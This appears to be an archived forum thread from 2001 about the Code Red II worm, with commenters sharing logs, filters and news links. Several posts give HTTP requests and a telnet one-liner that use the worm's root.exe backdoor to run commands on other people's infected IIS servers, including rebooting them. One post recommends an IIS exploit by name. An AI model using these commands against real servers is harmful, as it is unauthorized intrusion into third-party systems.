Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

Help track this: submit your logs to dshield!

[mjh]

You might want to consider submitting your apache logs to dshield. This will help keep track of the extent of this problem as well as help to analyze where it may have originated. If the dshield folks can correlate the earliest attacks of the latest variant, they have a chance at finding where this thing originated.

Submissions can be made by following these instructions.

Re:Help track this: submit your logs to dshield!

[LinuxHam]

It uses libpcap to sniff all packets that the interface receives. And if you configure snort to use promiscuous mode, then it'll even track attacks that aren't directed towards your machine.

I'm on 56k ppp dialup, so I shouldn't see any attacks (let alone packets) not destined for my machine. Now that you know that, you should also know that I was rejecting all connections to port 80 with ipchains. Therefore, since the worm couldn't connect, it wouldn't transmit the HTTP request that snort is watching for.

By hanging netcat on port 80 with a 3 second connect limit using xinetd, all inbound port 80 probes get connections. They send their payload, snort alerts on it, netcat routes it directly to /dev/null, and then closes the connection. No huge apache logs, or whatever minimal risks are associated with apache.

I shunt the payloads directly to /dev/null just so snort can actually watch them coming in. I literally asked for a "dummy listener" on the snort list, and they pointed me to netcat at l0pht.

Killing small ISPs

[Alien54]

I know of at least one small ISP that had very serious problems this week.

First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.

Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.

BOOM!

If this keeps happening, this is going to be bad for business in a lot of places.

This will put a bandaid on the problem:

[Telek]

try this:

GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexpl oit+>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixm e.c md HTTP/1.0
GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u00 2Br+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0

this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.

Re:huge cable modem hits

[iturbide]

OK, You can use tcpdump and/or ethereal to check traffic over your interface. Be ready for rpm dependency resolution hell, but any decent distro should have all the neccessary packages. Ethereal is the damned good GUI thing sitting on top of tcpdump, and it will tell you straightaway what is going on.

And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.

Enjoy

SirCam procmail recipe

[tstock]

:0 B
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HD o8OkQ6SD
/dev/null

Mountain Dew: Code Red

[Spaztek]

Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syroupe, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which arent windows machines. I guess linux is like the caffeine of all soda. The good parts :-)

Securityfocus asks for IPs

[mawis]

To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310

The Whitehouse.gov lesson

It was clear, when the first version of Code Red was released, that whitehouse.gov was the intended target of a Distributed Denial Of Service attack.

They got lucky when the hacker messed up (he used a hard IP instead of domain name). What did they do in response?

What did the whitehouse.gov admins do once they realized that they were a clear target? Write angry but useless letters to microsoft? Call Bill Gates and piss and moan?

NO! they took a PRO-ACTIVE reaction to a threat of clear and eminent danger to information distribution and installed Linux.

www.whitehouse.gov is there a lesson there?

Re:File download script

[Xemu]

Also, I was unable to figure out a way to get the machines to reboot or restart IIS

Rebooting a compromised IIS server is trivial, just add this to your script

(echo "GET /scripts/root.exe?/c+iisreset+/reboot HTTP/1.0\n\n\n\n" ; sleep 5) | telnet $1 80

or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system.

A Warning to Whitehats

[Ms.Taken]

Anyone working on scripts which respond to Code Red attacks by patching the originating server should read this cnet article, which calls that approach 'hack-back'.

From the article:

The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."

It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.

Re: How to be a nicer guy

http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20h ttp://www.digitalisland.com/codered/

Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch :/ since it also creates the /c and /d aliases to *keep* them infected...)

I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh* ...)

If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...

This looks big time

[JerkyBoy]

Holy crap. http://www.msnbc.com/news/606910.asp

Re:Code Red Infects Slashdot!

[Umanity]

Notice that this article was written before the appearance of CR2, the more virulent version of Code Red. I too believed that the worm was "Overhyped" in the media. But as of yesterday, I saw a four-fold increase in the attacks from the worm. I think the new version could be quite a problem. I have been tracking down systems infecting others and calling the sysadmin. I think we need to pro-actively stop this thing by alerting sysadmins that their machines are compromised.

I have noticed that a lot of the recent hits have been coming from my Service Providers address space. And the frequency of attacks are increasing. On the 2nd of August I only got about 30 hits, about 1 every hour. On the 4th of August I got over 80 hits, thats about 4 hits an hour.

This thing is gaining momentum... Don't be foolish and underestimate it...

New Sites report on CR2

[stuccoguy]

CNN has very little to say about the subject.

MSNBC has a longer story.

Fox News has a few words to say.

ABC copied the AP story.

CBS still seems to think the red tide is receeding.

Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.

Try this

[jsse]

jill.c. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)

How to send a message to the poor bastards

[Brian+Stretch]

A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:

http://ipaddress/c/inetpub/scripts/root.exe?/c+n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server

%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
the title:

CGI Error

The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:

and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.

The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.

Re:How to send a message to the poor bastards

I had trouble getting root.exe to actually run any other program. I was able to execute commands interpreted by the shell (dir, echo, etc.), but not run any other program. The solution to this was to copy the program you want to run to the scripts directory ('copy' is a shell interpreted command), and then do a GET directly against the program, like so:

GET /scripts/root.exe?+/c+copy+c:\winnt\system32\ipcon fig.exe+. HTTP/1.0
GET /scripts/ipconfig.exe?+/release HTTP/1.0

Something similar would probably be required to get net.exe to run. BTW, the above doesn't work to shut down their network. Apparently the scripts aren't run with enough permission to do that. Also tried the same with iisreset /stop.

List of CodeRed IPs here

[leonbrooks]

This sorted list (updated hourly) are the IPs for CodeRed attacks on a single IP address in Western Australia.

Last week: 92

Last 32 hours: 196 (175 unique addresses)

Looks like it's concrete bunker time soon... )-: